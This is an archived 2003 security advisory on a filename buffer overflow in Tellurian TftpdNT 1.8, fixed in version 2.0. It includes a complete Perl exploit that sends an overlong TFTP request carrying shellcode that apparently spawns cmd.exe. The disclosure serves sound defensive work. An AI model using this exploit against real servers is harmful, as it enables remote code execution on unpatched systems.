tellurian.txt

2003-09-04T00:00:00
ID PACKETSTORM:31584
Type packetstorm
Reporter storm
Modified 2003-09-04T00:00:00

Description

                                        
                                            `Security Vulnerability in Tellurian TftpdNT (Long Filename)  
------------------------------------------------------------------------   
  
  
  
Article reference:   
http://www.securiteam.com/windowsntfocus/5RP0M1PAUM.html  
  
SUMMARY  
  
Tellurian TftpdNT (http://www.tellurian.com.au/) is a TFTP server for Windows   
NT and Windows 9x.   
A buffer overflow vulnerability in the product allows remote attackers to   
cause the product to overflow an internal buffer, while executing arbitrary   
code.   
  
  
DETAILS  
  
Vulnerable systems:   
* TftpdNT version 1.8   
  
Immune systems:   
* TftpdNT version 2.0   
  
It is possible to cause a buffer overflow in the Tellurian TftpdNT product,   
while overwriting the EIP pointer - this allows remote command execution.   
The overflow occurs in the product's parsing of the filename.   
  
Vendor status:   
The vendor has been informed, and has fixed the issue within 24 hours. A new   
version is available on the web site.   
  
Exploit:   
#!/usr/bin/perl -w   
#Tellurian TFTP Server buffer overflow vulnerability   
  
use IO::Socket;   
$host = "192.168.1.44";   
$port = "69";   
  
$shellcode = "\x90\xCC\x90\x90\x90\x90\x8B\xEC\x55\x8B\xEC\x33\   
\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\   
\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\   
\x45\xFE\x65\xB8\xC3\xAF\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x5F";   
  
$buf = "\x00\x02";   
$buf .= "\x41"x(508-length($shellcode));   
$buf .= $shellcode;   
$buf .= "\x0F\x02\xC7"; # EIP   
$buf .= "\x00\x6E\x65\x74\x61\x73\x63\x69\x69\x00";   
  
print "Length: ", length($buf), "\n";   
  
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error:   
$@\n";   
$ipaddr = inet_aton($host) || $host;   
$portaddr = sockaddr_in($port, $ipaddr);   
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";   
print "Done\n";   
  
  
  
  
SecurITeam would like to thank STORM (storm@securiteam.com) for finding this   
vulnerability.   
  
--   
Aviram Jenik  
Beyond Security Ltd.  
http://www.BeyondSecurity.com  
http://www.SecuriTeam.com  
  
Know that you're safe:  
http://www.AutomatedScanning.com  
`